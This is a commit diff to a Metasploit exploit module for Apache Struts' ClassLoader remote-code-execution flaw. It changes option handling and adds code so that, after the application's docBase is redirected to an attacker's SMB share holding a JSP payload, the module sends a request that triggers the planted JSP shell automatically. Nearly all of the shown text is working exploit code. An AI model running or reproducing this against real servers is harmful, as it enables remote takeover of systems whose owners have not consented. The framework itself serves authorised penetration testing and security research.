Autotrigger JSP shell at docBase

modules/exploits/multi/http/struts_code_exec_classloader.rb

@@ -84,12 +84,10 @@ class Metasploit3 < Msf::Exploit::Remote
         Opt::RPORT(8080),
         OptEnum.new('STRUTS_VERSION', [ true, 'Apache Struts Framework version', '2.x', ['1.x','2.x']]),
         OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"]),
-        OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 10]),
-        OptString.new('FILE_NAME', [ true, 'The JSP file with the payload (target dependant)', 'HelloWorld.jsp']),
-        OptString.new('FOLDER_NAME', [ true, 'The Folder where the JSP payload lives (target dependant)', 'example'])
+        OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 10])
       ], self.class)
 
-    deregister_options('FILE_CONTENTS')
+    deregister_options('SHARE', 'FILE_NAME', 'FOLDER_NAME', 'FILE_CONTENTS')
   end
 
   def jsp_dropper(file, exe)
@@ -226,6 +224,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   # Used with SMB targets
   def primer
+    self.file_name << '.jsp'
     self.file_contents = payload.encoded
     print_status("JSP payload available on #{unc}...")
 
@@ -238,6 +237,16 @@ class Metasploit3 < Msf::Exploit::Remote
         'class[\'classLoader\'].resources.dirContext.docBase' => "\\\\#{srvhost}\\#{share}"
       }
     })
+
+    jsp_shell = target_uri.path.to_s.split('/')[0..-2].join('/')
+    jsp_shell << "/#{self.file_name}"
+
+    print_status("#{peer} - Accessing JSP shell at #{jsp_shell}...")
+    send_request_cgi({
+      'uri'     => normalize_uri(jsp_shell),
+      'version' => '1.1',
+      'method'  => 'GET',
+    })
   end
 
   def class_loader_exploit